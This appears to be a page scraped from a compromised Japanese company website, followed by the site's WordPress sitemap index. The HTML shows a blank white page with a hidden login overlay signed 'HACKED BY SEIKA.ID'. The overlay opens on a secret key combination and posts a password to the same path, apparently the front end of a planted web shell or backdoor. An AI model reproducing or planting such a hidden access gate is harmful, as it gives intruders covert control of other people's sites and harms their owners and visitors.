<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>machikatsu.co.jp</title>
<style>
  *, *::before, *::after { margin: 0; padding: 0; box-sizing: border-box; }

  body {
    background: #ffffff;
    width: 100vw;
    height: 100vh;
    overflow: hidden;
    font-family: 'Courier New', Courier, monospace;
  }

  /* ── OVERLAY LOGIN ── */
  #__overlay {
    display: none;
    position: fixed;
    inset: 0;
    background: rgba(0, 0, 0, 0.88);
    backdrop-filter: blur(4px);
    z-index: 99999;
    justify-content: center;
    align-items: center;
    animation: fadeIn .2s ease;
  }
  #__overlay.active { display: flex; }

  @keyframes fadeIn {
    from { opacity: 0; }
    to   { opacity: 1; }
  }

  /* ── LOGIN BOX ── */
  #__box {
    background: #0d0d1a;
    border: 1px solid #00ff41;
    border-radius: 6px;
    padding: 36px 40px;
    width: 400px;
    box-shadow: 0 0 40px rgba(0, 255, 65, 0.25), 0 0 80px rgba(0, 255, 65, 0.08);
    animation: slideUp .25s ease;
  }

  @keyframes slideUp {
    from { transform: translateY(20px); opacity: 0; }
    to   { transform: translateY(0);    opacity: 1; }
  }

  #__box .header {
    color: #00ff41;
    font-size: 13px;
    letter-spacing: 2px;
    text-transform: uppercase;
    margin-bottom: 6px;
  }

  #__box .title {
    color: #ffffff;
    font-size: 20px;
    font-weight: bold;
    margin-bottom: 24px;
    border-bottom: 1px solid #1a1a2e;
    padding-bottom: 14px;
  }

  #__box label {
    display: block;
    color: #888;
    font-size: 11px;
    letter-spacing: 1px;
    text-transform: uppercase;
    margin-bottom: 8px;
  }

  #__box input[type="password"] {
    width: 100%;
    background: #0a0a14;
    border: 1px solid #1e3a1e;
    border-radius: 4px;
    color: #00ff41;
    font-family: inherit;
    font-size: 15px;
    padding: 10px 14px;
    outline: none;
    letter-spacing: 3px;
    caret-color: #00ff41;
    transition: border-color .2s;
  }
  #__box input[type="password"]:focus {
    border-color: #00ff41;
    box-shadow: 0 0 8px rgba(0,255,65,.2);
  }

  #__box button {
    margin-top: 18px;
    width: 100%;
    background: #00ff41;
    color: #000;
    border: none;
    border-radius: 4px;
    padding: 11px;
    font-family: inherit;
    font-size: 13px;
    font-weight: bold;
    letter-spacing: 2px;
    text-transform: uppercase;
    cursor: pointer;
    transition: background .2s, box-shadow .2s;
  }
  #__box button:hover {
    background: #00cc33;
    box-shadow: 0 0 16px rgba(0,255,65,.4);
  }

  #__msg {
    margin-top: 14px;
    font-size: 12px;
    letter-spacing: 1px;
    text-align: center;
    min-height: 16px;
    transition: all .2s;
  }
  #__msg.ok   { color: #00ff41; }
  #__msg.fail { color: #ff4444; }

  .hint {
    margin-top: 20px;
    color: #333;
    font-size: 10px;
    text-align: center;
    letter-spacing: 1px;
  }
</style>
</head>
<body>

<!-- Halaman utama tetap putih bersih -->

<div id="__overlay">
  <div id="__box">
    <div class="header">HACKED BY SEIKA.ID</div>
    <div class="title">PENJAHAT KELAMIN DI SINI</div>
    <label for="__pw">Password</label>
    <input type="password" id="__pw" placeholder="••••••••••••" autocomplete="off" autofocus>
    <button id="__btn">[ AUTHENTICATE ]</button>
    <div id="__msg"></div>
    <div class="hint">SEMANGAT TERUSS YAA!!</div>
  </div>
</div>

<script>
(function () {
  'use strict';

  const overlay = document.getElementById('__overlay');
  const input   = document.getElementById('__pw');
  const btn     = document.getElementById('__btn');
  const msg     = document.getElementById('__msg');

  // Hotkey trigger: Ctrl + Shift + Backspace
  document.addEventListener('keydown', function (e) {
    if (e.ctrlKey && e.shiftKey && e.key === 'Backspace') {
      e.preventDefault();
      overlay.classList.add('active');
      input.focus();
    }
    if (e.key === 'Escape') {
      overlay.classList.remove('active');
      clearMsg();
    }
  });

  overlay.addEventListener('click', function (e) {
    if (e.target === overlay) {
      overlay.classList.remove('active');
      clearMsg();
    }
  });

  btn.addEventListener('click', doAuth);
  input.addEventListener('keypress', function (e) {
    if (e.key === 'Enter') doAuth();
  });

  function doAuth() {
    const pw = input.value.trim();
    if (!pw) return;

    btn.disabled = true;
    setMsg('Verifying...', '');

    fetch(window.location.pathname, {
      method:  'POST',
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
      body:    '__p=' + encodeURIComponent(pw)
    })
    .then(function (r) { return r.json(); })
    .then(function (data) {
      if (data.s === 1) {
        setMsg('Access granted. Loading...', 'ok');
        setTimeout(function () { window.location.reload(); }, 600);
      } else {
        setMsg('Access denied. Wrong password.', 'fail');
        input.value = '';
        input.focus();
        btn.disabled = false;
      }
    })
    .catch(function () {
      setMsg('Network error.', 'fail');
      btn.disabled = false;
    });
  }

  function setMsg(text, cls) {
    msg.textContent  = text;
    msg.className    = cls;
  }
  function clearMsg() {
    msg.textContent = '';
    msg.className   = '';
    input.value     = '';
  }
})();
</script>

</body>
</html><?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://machikatsu.co.jp/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://machikatsu.co.jp/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://machikatsu.co.jp/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://machikatsu.co.jp/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://machikatsu.co.jp/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
